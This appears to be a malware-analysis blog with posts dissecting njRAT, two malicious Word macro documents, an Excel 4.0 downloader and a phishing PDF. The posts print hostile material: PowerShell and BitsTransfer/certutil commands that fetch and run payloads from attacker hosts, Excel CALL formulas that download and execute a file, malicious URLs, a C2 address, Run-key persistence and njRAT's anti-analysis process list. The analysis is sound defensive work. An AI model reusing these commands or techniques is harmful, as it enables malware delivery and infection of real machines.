Category: Malware Analysis

njRAT Malware Analysis

Anurag Gawande7 Comments

HASH MD5: 88e085572a182ca102676676ec0ef802

File Type: Win32 executable

Signature: Microsoft Visual C# v7.0 / Basic .NET

Link to Download Sample: Any.Run

Type: Remote Access Trojan

njRAT is a remote access Trojan. It is one of the most widely accessible

RATs. I came across this while going through

Any.Run trends and thought to download sample for analysis.

PE file information

I have disassembled executable file using dnSpy.

It makes easy to analyse the code. Stub shows entry point where I can

put breakpoint to start the debugging to analyse the behavior

.net version v2.0.50727

I start debugging and put break point at entry point.

Entry Point

Ko() function first check the list predefined process running on victim’s

machine if they are, the malware executable

will stop execution. In this case, wireshark was running in background.

It stops calling assembly and execution process.

To avoid call to CsAntiProcess which look for the running process, I change the value of anti_CH bool variable value to

false manually. (Value of variable can change from Locals windows)

CsAntiProcess handler look for the process and if its there , it stops execution.

Class CsAntiProcess

The list of process mentioned

SNProcess ListProcess Name
1 procexp Process Explorer (Sys Internal Tool)
2SbieCtrlSbieCtrl.exe (Sandboxie)
3SpyTheSpySpyware monitoring tool
4wireshakWireShark
5apateDNSApteDNS tool
6IPBlockerIPBlocker
7Tiger-Firewall
8smsniff
9exeinfoPEExeinfo PE Tool
10NetSnifferCS
11SandBoxie Control
12processhackerProcess Hacker
13dnSpy.Net disassembler (I am using it for debugging here)
14CodeReflector
15ILSpy.Net disassembler
16VGAuthServiceVMware Guest Authentication Service
17VBoxServiceVirtual Box Service
This table contains List of Process malware checks on the system on execution

NOTE: To bypass process check, I also changed the names of process e.g. Wireshark.exe to wk.exe and procexp.exe to prex.exe which helped to by pass process check when I executed malware without debugging in dnSpy because process names are hard coded.

On proceed with the debugging, it drops an executable file svchost.exe on the system at location

C:\Users\<user profile>\AppData\Roaming\svchost.exe

code that drops executable file.

EXE is a string variable initialized as svchost.exe. It could be named svchost.exe (Windows Service Host) to create

confusion and it make difficult to differentiate its malicious without analyzing its location and properties.

Captured in process monitor, file is written at location

It also drops Tools.exe at location C:\

File dropped at location C:\

File also drop at location

C:\USers\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\e84128b2e0547d1dd1f8090d86c80c48

and add to registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

Name: e84128b2e0547d1dd1f8090d86c80c48

Value data: “C:\Users\IEUser\AppData\Roaming\svchost.exe” ..

Adding this registry value, the executable will execute everytime when user logon to the system.

Dropping file in this case is copying itself to the three different location. As all three files have different names but same hash and code.

In code, IP address along with the port 7777 and executable names are initialized.

C2 Server IP Address details:

  • VT Score: 1/79
  • Status: Malicious
VirusTotal Score for C2 server IP address – Link

svchost.exe has sent TCP segment with SYN control bits to C2 server but there is no response from the server. Though

the IP address exists and IP location is Russia.

I used netstat to check the tcp connection.

Netstat command >> netstat -a
1) Command >> netstat -a -b 2) Process name svchost.exe sent TCP segment

Summary:

  • On execution, malicious executable file check running process on the system.
  • If any of the process running (listed in table above), malware stops execution.
  • It copies itself to three different locations:
    • C:\Tools.exe
    • C:\Users\<user profile>\AppData\Roaming\svchost.exe
    • C:\USers\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\e84128b2e0547d1dd1f8090d86c80c48.exe
  • Creates registry entry so e84128b2e0547d1dd1f8090d86c80c48.exe will execute every time user logon to the system.
  • Command and Control server IP address is 85.26. 235.163 port 7777
  • svchost.exe tried to connect to C2 server, server didn’t respond.
  • Accessing C2 server IP address on port 7777 in browser, gets 200 OK response with empty response header.

Thank you.

Comments and suggestions are welcome.

Word Macro Malware Analysis

Anurag GawandeLeave a comment

SHA256: dd81d70fa14f0e95b8cd2fe86a9a21a264cbb4bb32d80c4195fc13ee6791b994

Sample Link: Beta.VirusBay.io

File Type: Microsoft Word

File Extension: .doc

VirusTotal Score 29/61

I am going to use OLETools to analyse this word document sample. For initial document analysis I rely on this tool, if

you have read my earlier blog posts on word macro analysis, you can see I have used this tool. 

>>oleid.py <word document file>

Word document property
>>olevba.py -a <word document file>
VBA macro analysis

VBA macro analysis:

  • Macro will execute on document open.
  • It may open/write binary file on the system
  • It has hex strings
  • It has base64 obfuscated strings.

I can deobfuscate the base64 obfuscated base64 string using oldvba command

>>olevba.py --decode <word document file>

but I would open VBA developer tool and debug the VBA code.

To view macros navigate to View >> Macros >> View Macros

Macro windows

There is no macro available to Step into because macro is password protected.

Open VBA developer tool by pressing Alt+F11

To remove password, I will use code written by ndthanh link to the code is here Github

To use this code, right clicked on Project >> Insert >> Module it will open empty code window, copy paste code here.

Click on Run >> (Macro Name) unprotected

and password is removed and project is unlocked.

Document_Open() executes on opening word document.

VBA has forms and modules.

Forms

  • pfoi23hj
  • roihwo23

Macro Modules

  • ajbhk3h43
  • bcsjw
  • bklern4jh
CommandButton1() is auto executable

I put a breakpoint and started debugging modules and got the list of URL’s it tries to connect

URLs are obfuscated base64 strings

URLs Obfuscated base64 strings

  • aHR0cDovL3NhbHdhZG0uY29tL3RjcGh4Lzg4ODg4ODgucG5n
  • aHR0cDovL2ZsaXBrZW55YS5jb20vbnVqYXpid3JoankvODg4ODg4OC5wbmc=
  • aHR0cDovLzEweDQ1LmNvbS96ZmJqdnZxeGt0eC84ODg4ODg4LnBuZw==
  • aHR0cDovL2lhbXBsb3llZC5ubC9sYmJpdWpkeWp5Lzg4ODg4ODgucG5n
  • aHR0cDovL2FwdG9jaXVkYWRhbXVyYWxsYWRhY2FydGFnZW5hLmNvbS9nZGRxZXovODg4ODg4OC5wbmc=
  • aHR0cDovL2F1dG9lc2NvbGFjaWdhbm9zLmNvbS5ici9nZXp6Zi84ODg4ODg4LnBuZw==

After deofuscated base64 URLs

http://salwadm . com/tcphx/8888888.pngVT Score
http://flipkenya . com/nujazbwrhjy/8888888.pngVT Score
http://10×45 . com/zfbjvvqxktx/8888888.pngVT Score
http://iamployed . nl/lbbiujdyjy/8888888.pngVT Score
http://aptociudadamuralladacartagena . com/gddqez/8888888.pngVT Score
http://autoescolaciganos . com . br/gezzf/8888888.pngVT Score

Code also drops BAT file tmp.bat and execute it to create a directory tmpdir at location C:\Users\Public\

location C:\Users\Public where bat file dropped

Next code deobfuscate string by replacing a letter by its preceding letter. E.g. ‘Q’ will be replaced with ‘P’

PowerShell command

Below is the PowerShell Command with obfuscated string

powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL3NhbHdhZG0uY29tL3RjcGh4Lzg4ODg4ODgucG5n')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e')

Deobfuscated base64 string

powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('http://salwadm . com/tcphx/8888888.png')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('C:\Users\Public\tmpdir\file')) + '1' + '.e' + 'x' + 'e')

PowerShell script download an executable file file1.exe from the URL. After taking closer look at this file, its a html page with .exe extension.

File downloaded by PowerShell script

I have uploaded this file to VirusTotal and the was zero detection as malware.

SHA256: 3b11440abf602e0ac35a8a1489ed26ec0103ed2ba636520761c698e5fb2df9d1

VirusTotal score link here

Summary:

  • On document opening, forms execute.
  • Drops bat file which create a folder on victim’s machine
  • Executes PowerShell script which downloads a file from one of the multiple sources of URLs.
  • Look for antivirus protection, real time protection values in registry.

Word Macro Malware Analysis

Anurag Gawande4 Comments

Hash: 98fe0b166f550446cbf9e0f368eb8bea79d2eec29fa033cee1ff8f8e38a12836

Sample Download Source: beta.virusbay.io

File Type: Microsoft Word Document

File Format: .doc

VirusTotal Scrore: 32/62

Document Preview:

Blg16_08052020_3

File Property:

cmd> olemeta.py <filename>
Blg16_08052020_8

Document Macro Analysis:

cmd> olevba.py -a <filename>

Document_Open macro executes on opening document.

Blg16_08052020_1

The first thing I was trying to access Macro. By default it was disabled, to enable it go to Files > Options > Trust Center > Macro Settings > Select Enable all macros and select checkbox Trust access to the VBA project object mode

Blg16_08052020_9

Post enabling macro, I navigate to View > Macros > View Macros 

There are macros in document.

Blg16_08052020_10

I tried to step into Document_Open macro which executes on document open. But I got an error Project Locked and Project is unenviable.

Blg16_08052020_11

To make it viewable, I downloaded tool EvilClippy. This tool create new copy of word document in same directory as your current document.

Blg16_08052020_12

Now when I open document which is project viewable and open VBA Development tool by pressing F11 and tried to open macro code, I was getting Project Password prompt.

Blg16_08052020_13

To remove/bypass this password, there is a VBA code, Git hub link

I am going to create a new module and paste this code there and run the macro unprotected

Blg16_08052020_14

Debugging Macro

I started debugging macro code and found below code runs PowerShell command

Blg16_08052020_15

PowerShell that written to location C:\Users\<profile>\AppData\Roaming\Temp\

Blg16_08052020_16

PowerShell command that executes via command line.

powershell -windowstyle hidden -command Import-Module BitsTransfer; Start-BitsTransfer -Source http://neoneo-bg.site/hIeak.dat,http://neoneo-bg.site/geTask.dat,http://neoneo-bg.site/rTTj.dat -Destination \"$env:TEMP\vido.com\",\"$env:TEMP\sfera\",\"$env:TEMP\rTTj.com\"; Set-Location -Path \"$env:TEMP\"; certutil -decode sfera po15p; Start-Process vido.com -ArgumentList po15p

PowerShell connects to the below URLS and save files vido.com, rTTj.com and sfera to location C:\Users\<user>\AppData\Local\Temp

I tried to debug the PowerShell script but the URL is no more accessible. Sadly, I couldn’t download the files those gonna download by this script.

http://neoneo-bg.site/hIeak.dat

VirusTotal Score: 5/71

Blg16_08052020_18

http://neoneo-bg.site/geTask.dat

VirusTotal Score: 7/71

Blg16_08052020_19

http://neoneo-bg.site/rTTj.dat

VirusTotal Score: 5/71

Blg16_08052020_20

Summary:

  • On opening document, word macro executes PowerShell command.
  • PowerShell command downloads file to Temp folder.

Thank you. Please post comments for suggestions.

Excel 4.0 macro Trojan Downloader – Malware Analysis

Anurag Gawande8 Comments

Hash: 89e62ec08b0b6065134c67937bae76ccd70163770fd6992574e41b9c82c3cf1c

Sample Download Link: beta.VirusBay.io

Application Name: Microsoft Excel

File Type: xls

VirusTotal Score: 29/60

Blg15_02052020_1

I came across this sample on VirusBay.io. I downloaded this malicious excel file on my VM for malware analysis.

OLEVBA.py

First thing I did analysis of VBA macro source code in excel file using OLETools.

Command > OLEVBA.py -a

Blg15_02052020_2

The result shows, macro will auto execute on opening file and it may run executable file may be using shell command and will download a file from remote server. The executable file name is FBpKzqF.exe

Document Property:

Blg15_02052020_3

XLM macro has been used in this file which is hidden.

Blg15_02052020_4

Steps To Make Macros Sheet Visible

Step 1

I enabled it by right click on the spreadsheet which is open in Excel and selected Unhide…

Blg15_02052020_6

And then a popup shows the name of spreadsheet I will select to unhide. Here name of sheet is SODXOFScMLy.

Blg15_02052020_7

Step 2

Along with this need to unblock the excel file and can be done by right click on excel file > General Tab > check option Unblock. I ran OLEVBA to check the visibility status of macro and now it turned to visible.

Blg15_02052020_21

While going through spreadsheet, I searched for keywords those I found in macro extracted using tool OLEVBA

OLEVBA macro extracted show a string value of C:\ProgramData\FBpKzqF.exe

Blg15_02052020_12

So I tried to look for .exe in spreadsheet, I was sure I will get something here and I found a link of a website  http:// gstat.dondyablo .com/ fattura.exe here fattura.exe is just a html page. (VirusTotal link here)

Blg15_02052020_11

Verification of above URL on VirusTotal shows URL is up and malicious and scores 17/79.

Blg15_02052020_13

I also did NSLookUp for URL. There are three IPs assigned to this site. First 2 from Russia and third one from Netherlands.

Blg15_02052020_14

Next I started looking for formula and Call functions in columns as I saw them in extracted macro by olevba.py. (screenshot below)

Blg15_02052020_22

I started with Call function, right click and run this call function.

Blg15_02052020_23

Click on Step in.

Blg15_02052020_24

Click on Evaluate will evaluate the values of parameters of call.

Blg15_02052020_25

Post Evaluation

=CALL($BZ$118,$HT$592, "JJCCJJ",0,$BB$54,$GI$1025,0,0)
Blg15_02052020_26

Here the value of

$BZ$118 = “URLMON”

$HT$559 = “URLDownloadToAFile”

$BB$54 = http:// gstat.dondyablo .com/ fattura.exe”

$GI$1024 = “C:\ProgramData\FBpKzqF.exe”

call("URLMON","URLDownloadToAFile","JJCCJJ",0,
"http:// gstat.dondyablo .com/ fattura.exe", 
"C:\ProgramData\FBpKzqF.exe")

There is another call function, I am evaluating to get the value of this call function.

=CALL($H$24,$GD$694, "JJCCCCJ",0,$I$1161,$GI$1025,,0,0)
Blg15_02052020_27

$H$24 = “Shell32”

$GD$694 = “ShellExecuteA”

$I$1161 = “open”

$GI$1025= “C:\ProgramData\FBpKzqF.exe”

=Call("Shell32", "ShellExecuteA", "JJCCJJ", 
"open", "C:\ProgramData\FBpKzqF.exe",,0,0)

Looking at these two call functions, I can say

  • The first call function will download the executable file from the URL
  • The second call function will execute the executable file on victims machine.

Next I will test, enable Internet on my VM and will run first call function instead of step in which will download the executable.

Network Log: 

Network log shows connection made to IP address 195. 22. 152. 76 and IP address resolved to DNS gstat. dondyablo .com

Blg15_02052020_31

Below image shows, it is downloaded ms dos application.

Blg15_02052020_35
Blg15_02052020_33

URL is hosted on Apache server and host server is Ubuntu.

Blg15_02052020_28

Process Explorer: 

Process explorer capture the TCP connection with remote IP address and download the executable file at two location

  • C:\ProgramData\FBpKzqF.exe
  • CC:\Users\IEUser\AppData\Local\Microsoft\Windows\INetCache\IE\LQ86GWLO\fattura[1].exe (temp location)
Blg15_02052020_32
Blg15_02052020_30

Downloaded Executable File Information

File name: FBpKzqF.exe

File Type: Win32 EXE

Hash: cddf3cc072913f9e5b0a020b12a0d80184b34a82f6ea6f8f7e95475a87de268c

VirusTotal Score: 50/70

Blg15_02052020_34

Summary

  • Excel file is Excel 4.0 macro in hidden spreadsheet (SODXOFScMLy)
  • Macro call functions download executable FBpKzqF.exe
  • “http:// gstat.dondyablo .com/ fattura.exe” from where executable downloaded.
  • downloaded executable file is a trojan malware.

PDF malware analysis

Anurag Gawande2 Comments

Hash: d26a7e67cda125f11270af0a820f6644cf920ed70fd5b166e82757dabb6d1ee0

Download sample link: Here

File type: PDF

VirusTotal score: 27/54

Blg14_300420202_2

PDF Document Preview

Blg14_300420202_18

PDFiD

I have used PDFiD tool to analyse the header of pdf file. Observed file contains 24 URL’s.

Blg14_300420202_1

Next step is to extract URL’s from the document. I will use two tools here to perform this, pdf-parser and PDFStreamDumper.

pdf-parser

I am using pdf-parser tool to extract only the list of URL’s from this document. for that I am navigating to the pdf-parser folder and executing command. pdf-parser is python script.

pdf-parser.py -k /URI <.pdf file> 

Blg14_300420202_11

There are these 5 URLs extracted from the pdf document.

(http://www.diamondcreationslb . com/doc/rdd.htm)
(http://ruseuropharm . ru/tobi/index.php)
(http://tcil-bd . com/tin-count/zigi/index.php)
(http://tcil-bd . com/wp-includes/IXR/alen/index.php)
(http://tcil-bd . com/dfp/index.php)

PDFStreamDumper

PDFStreamDumper is very handy tool with GUI. This loads all objects in PDF file and show in Text, Hex format. Opening malicious pdf file in PDFStreamDumper, I can see URL’s under objects. To get all the URL’s I will have to go through all objects from the left panel one by one.

E.g.

Blg14_300420202_12

URL Verification

http://www.diamondcreationslb . com/doc/rdd.htm

Report : Phishing

Blg14_300420202_13

http://ruseuropharm . ru/tobi/index.php

Report: Phishing

Status: 404

Blg14_300420202_14

http://tcil-bd . com/tin-count/zigi/index.php

Report: Phishing

Status: 404

Blg14_300420202_15

http://tcil-bd . com/wp-includes/IXR/alen/index.php

Report: Phishing

Status: 404

Blg14_300420202_16

http://tcil-bd . com/dfp/index.php

Report: Phishing

Status: 404

Blg14_300420202_17

Summary:

  • PDF File has URL’s embedded.
  • All URLs are phishing.